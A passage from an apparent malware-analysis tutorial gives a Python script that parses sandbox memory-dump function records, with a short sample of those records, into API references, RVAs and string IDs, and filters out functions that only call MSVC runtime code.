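• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• String ID: MOC$RCC
• Opcode ID: c50455448f6212aefba6dbeb43bbf18c90c9a38ddf061928018d89d8582c6e33
Uniqueness Score: -1.00%
APIs
• ___std_exception_destroy.LIBVCRUNTIME ref: 0035647E
• ___std_exception_destroy.LIBVCRUNTIME ref: 0035648D
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• String ID: Te9
• Opcode ID: 276c3ed79ba903fcb1f9c0186ebd5ad7f7b1303dcb56a273e68787e397f27329
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^• (\w+)\.([A-Z0-9_]+)(?:\([^)]*\))?,? ref: ([0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^• ([A-Za-z ]+): (.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score: (-?[\d.]+)%$")
BASE_RE = re.compile(r"Offset: ([0-9A-Fa-f]{8})")
CRT_MODULES = {"LIBVCRUNTIME", "LIBCMT", "LIBCMTD", "UCRTBASE", "MSVCRT"}
# Win32 calls that MSVC's own startup/exit code makes (analyst heuristic, not
# something the report asserts).
CRT_SCAFFOLD_APIS = {"EncodePointer", "DecodePointer", "InitializeSListHead",
                     "IsProcessorFeaturePresent"}

@dataclass
class ApiRef:
    name: str
    module: str
    ref: int  # virtual address exactly as printed after 'ref:'

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    base: int = 0
    string_id: str = ""
    opcode_id: str = ""
    uniqueness: float = 0.0

def parse_records(text):
    """A record ends at its 'Uniqueness Score' line; a trailing record without one is dropped."""
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip()  # the HTML extraction left deep indentation on every line
        if m := SCORE_RE.match(line):
            cur.uniqueness = float(m.group(1))
            records.append(cur)
            cur = FuncRecord()
        elif m := API_RE.match(line):
            cur.apis.append(ApiRef(m.group(1), m.group(2), int(m.group(3), 16)))
        elif m := KV_RE.match(line):
            key, val = m.groups()
            if key == "Source File" and (b := BASE_RE.search(val)):
                cur.base = int(b.group(1), 16)
            elif key == "String ID":
                cur.string_id = val
            elif key == "Opcode ID":
                cur.opcode_id = val
    return records

def rva(ref, base):
    """RVA = dumped VA - image base; add your own base in IDA/Ghidra to land on the function."""
    return ref - base

def is_runtime_scaffolding(rec):
    """True when every API the function touches belongs to the MSVC runtime."""
    return bool(rec.apis) and all(a.module in CRT_MODULES or a.name in CRT_SCAFFOLD_APIS
                                  for a in rec.apis)

def triage(text):
    seen, out = set(), []
    for rec in parse_records(text):
        if rec.opcode_id in seen:  # same opcode hash: identical code already listed
            continue
        seen.add(rec.opcode_id)
        out.append({"apis": [a.name for a in rec.apis],
                    "rvas": [f"{rva(a.ref, rec.base):#x}" for a in rec.apis],
                    "strings": rec.string_id.split("$") if rec.string_id else [],
                    "scaffolding": is_runtime_scaffolding(rec)})
    return out

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run it over the full function-analysis text of a report (after copying it to a file) and filter on `scaffolding == False` to get the short list of functions that actually call into Win32, crypto or networking APIs; the "String ID" field is split on `$`, which is how the report joins the strings a function references.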